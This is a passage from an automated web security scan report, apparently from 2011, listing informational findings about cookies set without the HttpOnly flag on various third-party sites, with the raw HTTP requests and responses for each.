X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: MSIDCookie=4d53178e-2130-49fe-b455-ab75448035ad; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

16.103. http://get.adobe.com/flashplayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.adobe.com
Path:   /flashplayer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flashplayer/ HTTP/1.1
Host: get.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:31 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Thu, 25-Apr-2041 13:22:32 GMT;path=/cfusion/
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...

16.104. http://goto.ext.google.com/og-dogfood-issue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goto.ext.google.com
Path:   /og-dogfood-issue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-dogfood-issue HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-dogfood-issue
Set-Cookie: S=apphosting=8SribwcO4Mcd0-MAAYmkHg; path=/
Date: Tue, 03 May 2011 13:22:41 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close


16.105. http://goto.ext.google.com/og-exp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goto.ext.google.com
Path:   /og-exp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-exp HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-exp
Set-Cookie: S=apphosting=2noDm76XrlpbxgzGjmIMZw; path=/
Date: Tue, 03 May 2011 13:22:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close


16.106. http://html.aggregateknowledge.com/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?pid=32&itemid=298028&senduuid=0&che=1304429183 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=675403482179266479; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sun, 01-May-2016 13:33:19 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0AARa%2Bq0AAAAAAAEAEOFTAAAAIAAA; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Thu, 02-May-2013 13:33:19 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 301
Date: Tue, 03 May 2011 13:33:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">
</head>

<body style="border: 0; margin: 0
...[SNIP]...

16.107. https://ibank.barclays.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ibank.barclays.co.uk
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: olbvisitor=1304385986443869302501514846; tabIndex=1; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304421997884:ss=1304421997884

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 10:20:55 GMT
Content-length: 0
Content-type: text/html
Location: /olb/w/LoginMember.do
Set-Cookie: WLBC=640359596.32800.0000; path=/


16.108. http://in.getclicky.com/in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /in.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /in.php?site_id=47665&res=1920x1200&lang=en&href=%2Flanding%2Fgoogle%2Fpackettrapit%2Fwireless.asp%3Fsrc%3Dcps11%3Fs_kwcid%3DTC%7C14898%7Cwireless%2520network%2520strength%2520monitor%7Cformlessnetworking.com%7CC%7C%7C7322411534&title=Monitor%20wireless%20network%20performance%20with%20PacketTrap%20IT%20from%20ScriptLogic&ref=http%3A%2F%2Fwww.sedoparking.com%2Fsearch%2Fregistrar.php%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking.com&jsuid=2631301918575094172&mime=js&x=0.8654681562363493 HTTP/1.1
Host: in.getclicky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:36 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-8+etch6
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: cluid=2631301918575094172; expires=Sat, 03 May 2031 13:42:36 GMT; path=/
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 0


16.109. http://ktbcare.hi5.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ktbcare.hi5.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ktbcare.hi5.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Location: /friend/profile/displayHi5URL.do?nickname=ktbcare
Content-Length: 0
Date: Tue, 03 May 2011 13:24:11 GMT
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246b02b3660;expires=Tue, 03-May-11 13:46:00 GMT;path=/


16.110. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=703223&srvc=17&betr=A4308=LP&betq=8131=400416 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=Bgo++2kAAAAAZm1CAEAAYCABAAAABAAAAwAAYCA; BASE=Rgwq2yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700L!; ROLL=boAns2y+ORAgE35hcNnzzw4yJN5Vmd+Ul5QpwcLSPtbwfqO!; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; C2=IR1vN5pqFIxFGFiovUg3sYkxSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIY4dGAHCB9qBwhQTaaAcIcbmGAXtqWgGzakx1uaBhMrByHZAGAazFrhZmjohVG7IFwGlGKfj0jw+NXYXLirBFAbRjU2KoaQHw6pBvHphxUJ9GsuoGNykQZANZXYMs6uBBMnhxQrcGsNrGGTqHYwzeZYMgCmBvCix2Ob1HQiqGVwovfw10YUPRCMC7Gdxl4a+IQ4kGN1sQhwSkakXo6PCh6lhkB; GUID=MTMwNDM4NDU4NDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=Zf9vN5pqFIxFGVgovUg3sYkqSKMCItdBUhQ3WXAVIoLOGQFCKGeBUhQ3gZAVIMa4FQFCEGeBUhAmoZAVIwtlGQFCA9qBUhw2kXAVIY4dGQFCB9qBUhQTaaAVIcbmGQVtqWgGzakq1uaBhMrBWHZAFAazF7vZmjoh5F7IFwGlGadj0jw+NXYQLirBFAbRHU2KoaQAw6pBvHphVUJ9GsuoGdwkQZANZXYFs6uBBMnhVQrcGsNrGWRqHYwzeZYFgCmBvCixaOb1GQiqGl+ovfw10YUIRCMC7GdxJ4a+IQ4kGdzsQhwSkakQo6PCh6lhI95wIACHGAH; domain=advertising.com; expires=Thu, 02-May-2013 10:24:25 GMT; path=/
Set-Cookie: GUID=MTMwNDQxODI2NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Thu, 02-May-2013 10:24:25 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 03 May 2011 11:24:25 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

16.111. http://lvs.truehits.in.th/goggen.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lvs.truehits.in.th
Path:   /goggen.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /goggen.php?hc=c0002215&bv=0&rf=bookmark&test=TEST&web=86%2bw3I1VFK0u1DIAue87Ug%3D%3D&bn=Netscape&ss=1920*1200&sc=16&sv=1.3&ck=y&ja=y&vt=8A158878.1&fp=d&fv=10.2%20r154&truehitspage=BOT%20Homepage%20(Thai%20Version)&truehitsurl=http%3a//www.bot.or.th/english/Pages/BOTDefault.aspx HTTP/1.1
Host: lvs.truehits.in.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ck3rdparty=1

Response

HTTP/1.1 200 OK
Set-Cookie: truehitsid=WtLJ2Jfs; expires=Thu, 31 Dec 2037 17:00:00 GMT; path=/
Content-type: image/jpeg
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Connection: close
Date: Tue, 03 May 2011 11:44:17 GMT
Server: lighttpd
Content-Length: 91

GIF89a............333....!.......,..........,....=..l.....jzc].Vq.g..0....#.....w9........;

16.112. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.seenon.com
Path:   /b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430?AQB=1&ndh=1&t=3/4/2011%2013%3A26%3A30%202%20300&ns=deliveryagent&pageName=NBC%20Universal%20Store%3AFeatured%20Offers%3AWilliam%20%26amp%3B%20Catherine%20Royal%20Wedding%20DVD%3ADetail&g=http%3A//www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&r=http%3A//www.nbcuniversalstore.com/&cc=USD&events=prodView%2Cevent3&products=%3B298028&c1=NBC%20Universal%20Store%3AFeatured%20Offers&c2=NBC%20Universal%20Store%3AFeatured%20Offers&c3=NBC%20Universal%20Store%3AFeatured%20Offers&v3=browse&c4=NBC%20Universal%20Store%3AFeatured%20Offers&c5=Detail&c6=NBC%20Universal%20Store&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=852&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.seenon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:33:22 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E00211051D3F5C-6000012880291077[CE]; Expires=Sun, 1 May 2016 13:33:22 GMT; Domain=.seenon.com; Path=/
Location: http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430?AQB=1&pccr=true&vidn=26E00211051D3F5C-6000012880291077&&ndh=1&t=3/4/2011%2013%3A26%3A30%202%20300&ns=deliveryagent&pageName=NBC%20Universal%20Store%3AFeatured%20Offers%3AWilliam%20%26amp%3B%20Catherine%20Royal%20Wedding%20DVD%3ADetail&g=http%3A//www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&r=http%3A//www.nbcuniversalstore.com/&cc=USD&events=prodView%2Cevent3&products=%3B298028&c1=NBC%20Universal%20Store%3AFeatured%20Offers&c2=NBC%20Universal%20Store%3AFeatured%20Offers&c3=NBC%20Universal%20Store%3AFeatured%20Offers&v3=browse&c4=NBC%20Universal%20Store%3AFeatured%20Offers&c5=Detail&c6=NBC%20Universal%20Store&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=852&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 02 May 2011 13:33:22 GMT
Last-Modified: Wed, 04 May 2011 13:33:22 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www268
Content-Length: 0
Content-Type: text/plain


16.113. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/help/rss/4498287.stm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/hi/help/rss/4498287.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:14 GMT
Location: http://www.bbc.co.uk/terms/additional_rss.shtml
Keep-Alive: timeout=10, max=785
Expires: Tue, 03 May 2011 13:24:14 GMT
Connection: close
Set-Cookie: BBC-UID=846d2cd000a14f9e3e974970f1afb353a9de9c63b0a091794bfba34fd754ca480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 255

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/te
...[SNIP]...

16.114. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:23 GMT
Keep-Alive: timeout=10, max=797
Expires: Tue, 03 May 2011 13:24:23 GMT
Connection: close
Set-Cookie: BBC-UID=045dbce0a042c0970d04923c215c459e7213a490607001493bbb322c2d655fdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=045dbce0a042c0970d04923c215c459e7213a490607001493bbb322c2d655fdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43768

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...

16.115. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:16 GMT
Location: http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:24:16 GMT
Connection: close
Set-Cookie: BBC-UID=14eddcb01022a0f0cdd9e94f21d48d3e44053bf8b0d0b119db3ba39e6e7bac4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/earth/hi/earth_news/newsi
...[SNIP]...

16.116. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cricket/13264093.stm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:19 GMT
Location: http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm
Keep-Alive: timeout=10, max=779
Expires: Tue, 03 May 2011 13:24:19 GMT
Connection: close
Set-Cookie: BBC-UID=140d4ce0b0f21053aeb14117a15017094931c25ec030a1091b6b324a9f11dfc80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:19 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/sport2/hi/cricket/1326409
...[SNIP]...

16.117. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/13265403.stm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:18 GMT
Location: http://news.bbc.co.uk/sport2/hi/football/13265403.stm
Keep-Alive: timeout=10, max=767
Expires: Tue, 03 May 2011 13:24:18 GMT
Connection: close
Set-Cookie: BBC-UID=d40dbc10101250025d522e4a41d8b8f763c35633e03001593b3b32ea26ecf4e60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/sport2/hi/football/132654
...[SNIP]...

16.118. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:19 GMT
Location: http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm
Keep-Alive: timeout=10, max=786
Expires: Tue, 03 May 2011 13:24:19 GMT
Connection: close
Set-Cookie: BBC-UID=246dece020322093fde3b25401e635077e338bfed070816ab42b8ad5ff713c260Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:19 GMT; path=/; domain=bbc.co.uk;
Content-Length: 240

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/sport2/hi/formula_one/132
...[SNIP]...

16.119. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/13264093.stm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:24 GMT
Keep-Alive: timeout=10, max=792
Expires: Tue, 03 May 2011 13:24:24 GMT
Connection: close
Set-Cookie: BBC-UID=34cd4c40409250f8085ec3c921c41698c30a233970c08233975d83f5e6c1d5460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
